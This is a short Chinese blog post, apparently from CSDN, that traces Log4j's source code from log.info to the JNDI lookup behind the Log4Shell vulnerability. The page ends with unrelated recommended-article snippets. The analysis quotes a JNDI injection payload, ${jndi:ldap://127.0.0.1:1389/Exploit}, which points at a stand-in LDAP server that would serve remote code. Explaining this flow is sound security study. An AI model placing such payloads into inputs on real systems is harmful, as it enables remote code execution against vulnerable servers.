log4j反序列化源码分析

已于 2023-09-20 11:40:51 修改
阅读量59 收藏
点赞数
文章标签: log4j
于 2023-09-20 11:39:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lpcInJava/article/details/133071356
版权

从log.info到lookup

一句话分析

整体的返序列化流程我觉得分为三部分:
1. log4j本身的一些日志等级判断,配置判断和一些对象的初始化
2. 从log.info("当前用户为:{}","${jndi:ldap://127.0.0.1:1389/Exploit}")中提取出${jndi:ldap://127.0.0.1:1389/Exploit
3. 根据prefix即poc的jndi找到对应的StrLookup(log4j自己写的对象),并调用lookup()方法

一些小建议

StrSubstitutor.resolveVariable() 这个方法是递归方法,很绕容易跟晕,我觉得他就是字符处理获取到这的:jndi:ldap://127.0.0.1:1389/Exploit

代码的整个流程吧在这里插入图片描述

脑图自取最后吧

安全npc
关注
实时数仓(六):Protocol Buffers解析Canal[binlog日志]序列化反序列化操作
03-12 1006
大家好,欢迎来到本篇博客,利用空闲的时间来分享自己所学的知识,帮助和博主一样刚处于起步阶段的同学,水平不高,若有什么错误和纰漏之处恳请大佬不吝赐教,目前个人博客只有CSDN:https://zhenyu.blog.csdn.net/,感谢大家的支持,谢谢 送给大家一句话:今日事,今日毕 今日目标: 解析canal[binlog]日志 protocolbuffers的序列化反序列化操作 Protocol Buffers前言代码CanalProto Buffers使用调用 binlogToProt.
Java反序列化漏洞静态分析与动态验证研究与实现
04-10
为了验证TaintGadget的有效性,本文还设计了相应的实验,包括对XStream框架中爆出的反序列化漏洞进行静态分析对比、动态分析对比和时效性对比。实验结果显示,TaintGadget的静态命中率为78.9%,平均静态运行时间为...
日志框架之TLog讲解分析
上善若泪
01-05 3793
TLog提供了一种最简单的方式来解决日志追踪问题,TLog会自动的对日志进行打标签,自动生成traceId贯穿你微服务的一整条链路,在排查日志的时候,可以根据traceId来快速定位请求处理的链路。TLog不收集日志,只在原来打印的日志上增强,将请求链路信息traceId绑定到打印的日志上。当出现微服务中那么多节点的情况,官方推荐使用TLog+日志收集方案来解决。当然分布式追踪系统其实是链路追踪一个最终的解决方案,如果项目中已经上了分布式追踪系统,那TLog并不适用。如下图,是ELK配合TLog
浅谈LOG日志的写法
热门推荐
xiangnideshen的专栏
05-21 4万+
文章来源于公司的大牛 1 Log的用途 不管是使用何种编程语言,日志输出几乎无处不再。总结起来,日志大致有以下几种用途: l  问题追踪:通过日志不仅仅包括我们程序的一些bug,也可以在安装配置时,通过日志可以发现问题。 l  状态监控:通过实时分析日志,可以监控系统的运行状态,做到早发现问题、早处理问题。 l  安全审计:审计主要体现在安全上,通过对日志进行分析,可以发现是否存在非授权
某个系统艰难的反序列化
Javachichi的博客
05-16 390
可以看的出来,jdk7u21本质上是往LinkedHashSet中放两个对象,一个是恶意类,一个是此类的接口的代理,然后通过反序列化链随机触发代理的一个方法。在数据库相关jar包中,很容易找到这种类,之前我找到的是com.mysql.cj.jdbc.MysqlDataSource和oracle.jdbc.datasource.impl.OracleDataSource,但在目标环境中都无法使用。可以注意我最后用hashMap的处理。但注意,如果是jdk自带类,是无法覆盖掉的,这个时候就需要用到第二种方法。
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
shiro反序列化测试工具.zip
06-04
4. **测试工具的作用**:这些Shiro反序列化测试工具通常会模拟恶意的序列化数据,尝试在目标系统上进行反序列化操作,以检测是否存在漏洞。通过这些工具,开发者可以发现并修复Shiro配置或代码中的潜在问题。 5. **...
Java反序列化终极测试工具.zip
04-10
在给定的资源中,“Java反序列化终极测试工具”是一个针对这一过程的安全测试工具,特别设计用于在Java 1.8环境下运行。此工具可能帮助开发者或安全研究人员检测和利用潜在的反序列化漏洞。 首先,我们需要理解Java...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
Python自动化测试一文详解
master_hunter的博客
10-29 1036
自动化测试是使用软件工具自动执行测试用例的过程。与手动测试相比,自动化测试通过脚本或程序来执行测试,提高了测试的效率和可靠性。自动化测试的主要目的是发现软件中的缺陷并验证功能是否符合预期。假设我们有一个登录系统,手动测试可能需要多次输入不同的用户名和密码来验证其有效性,而自动化测试则可以通过编写一个脚本来批量执行这些输入,节省时间。在众多的 Python 测试框架中,pytest 因其简洁易用和强大的功能而广受欢迎。它不仅支持简单的测试用例编写,还能够扩展到复杂的测试需求。
Spring框架
2301_80768157的博客
10-31 820
spring是轻量级的开源javaee框架,Spring可以解决企业应用开发的复杂性。
第三百零八节 Log4j教程 - Log4j日志到数据库
2301_78772942的博客
11-02 255
第三百零八节 Log4j教程 - Log4j日志到数据库
Maven(22)如何使用Maven进行单元测试?
qq_43012298的博客
11-02 352
Maven提供了内置的支持来进行单元测试,主要通过插件实现。
TOP级AI驱动的单元测试工具推荐
NHB222222的博客
11-02 358
这篇文章,我想对开发人员人员来说更有帮助,毕竟开发同学“苦久已”!软件开发是一项创造性的工作,但其中也包含着许多乏味的任务。其中最乏味的莫过于编写“单元测试”了,用于验证软件组件是否按预期工作。单元测试有助于开发人员尽早发现缺陷。理想的情况是,编写程序的开发人员在编写代码的同时编写单元测试。但是编写单元测试是软件开发中的繁琐工作,会占用开发人员大量时间。更糟糕的是,开发人员在手动编写复杂代码库的单元测试时可能会犯错。因此,很多软件缺乏足够的单元测试,这使得代码难以维护。
基于MATLAB图像平滑处理代码面板GUI.zip
11-02
c
已更新2023-1992年中国省级、地级市、区县级夜间灯光数据(DMSP和VIIRS校正后)-最新出炉.zip
11-02
已更新2023-1992年中国省级、地级市、区县级夜间灯光数据(DMSP和VIIRS校正后)-最新出炉.zip
技术资料分享ZigBee问答之“KVP”、“MSG”非常好的技术资料.zip
11-02
技术资料分享ZigBee问答之“KVP”、“MSG”非常好的技术资料.zip
Flask-2.1.2.tar.zip
最新发布
11-02
Flask-2.1.2.tar.zip
基于MATLAB图像腐蚀膨胀源码面板GUI.zip
11-02
c
log4j反序列化漏洞原理
07-28
log4j反序列化漏洞是一种安全漏洞,它存在于Apache Log4j库中。该漏洞的原理是通过利用Log4j的JNDI(Java Naming and Directory Interface)功能,攻击者可以通过构造恶意的序列化数据来执行远程命令。 具体来说,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值